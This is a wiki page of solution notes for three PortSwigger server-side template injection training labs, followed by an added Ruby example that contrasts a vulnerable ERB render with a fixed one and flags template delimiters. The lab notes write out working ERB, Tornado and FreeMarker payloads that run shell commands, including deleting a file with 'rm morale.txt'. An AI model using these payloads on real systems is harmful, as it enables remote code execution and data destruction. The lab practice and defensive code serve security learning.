Server side template injection (SSTI) - gachikuku/portswigger GitHub Wiki
Practitioner lab:
Basic server-side template injection
Solution
- View products, notice the first product displays "Unfortunately this product is out of stock."
- Notice also the URL reflects that: https://uuid.web-security-academy.net/?message=Unfortunately%20this%20product%20is%20out%20of%20stock.
- Since the lab description says it's an ERB template, payloads can be found in the HackTricks ERB (Ruby) section.
- After testing with <%= 7*7 %> = 49, RCE can be used to delete the morale.txt file like so: https://uuid.web-security-academy.net/?message=<%= system("rm morale.txt") %>
Practitioner lab:
Basic server-side template injection (code context)
Solution
- Log in as wiener:peter.
- Use the "preferred name" functionality.
- Make a comment.
- Notice "preferred name" is reflected at https://uuid.web-security-academy.net/post?postId=<postnumber>.
- Change the POST request to test for SSTI with Tornado syntax: blog-post-author-display: {{7*7}}
- RCE to delete morale.txt (payload is ChatGPT generated from the Bug Hunter plugin): {{__import__('os').popen('rm morale.txt').read()}}
Practitioner lab: https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-using-documentation
Server-side template injection using documentation
Solution
- Log in with credentials.
- Modify a post.
- Generate an error, and take note of the framework used (in this case "freemarker").
- Use HackTricks for FreeMarker to craft a payload.
- Payload: <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("ls")}
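Added example, not from this wiki or the PortSwigger labs: a Ruby reconstruction of why the first lab's ?message= parameter is exploitable (the parameter is compiled as the ERB template) next to the fixed form that treats it as data, plus a small check that flags the template delimiters probed across all three labs (ERB, Tornado, FreeMarker) in a request parameter, for log review or a WAF rule. The function names, the template and the sample inputs are my own.

```ruby
require "erb"
require "cgi"

# Constructed sample inputs: the out-of-stock message the lab page shows,
# and the arithmetic probe used to confirm that template syntax is evaluated.
NORMAL_MESSAGE = "Unfortunately this product is out of stock."
ERB_PROBE      = "<%= 7*7 %>"

# Vulnerable pattern (hypothetical reconstruction of the lab's bug): the
# request parameter itself is compiled as the ERB template, so any
# <% ... %> directives it carries are executed on the server.
def render_vulnerable(message)
  ERB.new(message).result
end

# Fixed pattern: the template is a fixed string written by the developer and
# the request parameter is passed in as data, then HTML-escaped on output.
# Template syntax inside the parameter is rendered as literal text.
SAFE_TEMPLATE = ERB.new("<%= CGI.escapeHTML(message) %>")

def render_safe(message)
  SAFE_TEMPLATE.result_with_hash(message: message)
end

# Detection helper: flags delimiters of the three engines covered by these
# labs (ERB <% %>, Tornado {{ }}, FreeMarker ${ } and <# ... >) appearing in
# a request parameter. Expect false positives on free-text fields; tune per
# application.
TEMPLATE_DELIMITERS = /<%|%>|\{\{|\}\}|\$\{|<#/

def template_probe?(value)
  value.match?(TEMPLATE_DELIMITERS)
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable: #{render_vulnerable(ERB_PROBE)}"   # 49: probe was evaluated
  puts "safe:       #{render_safe(ERB_PROBE)}"         # &lt;%= 7*7 %&gt;
  puts "flagged:    #{template_probe?(ERB_PROBE)} / #{template_probe?(NORMAL_MESSAGE)}"
end
```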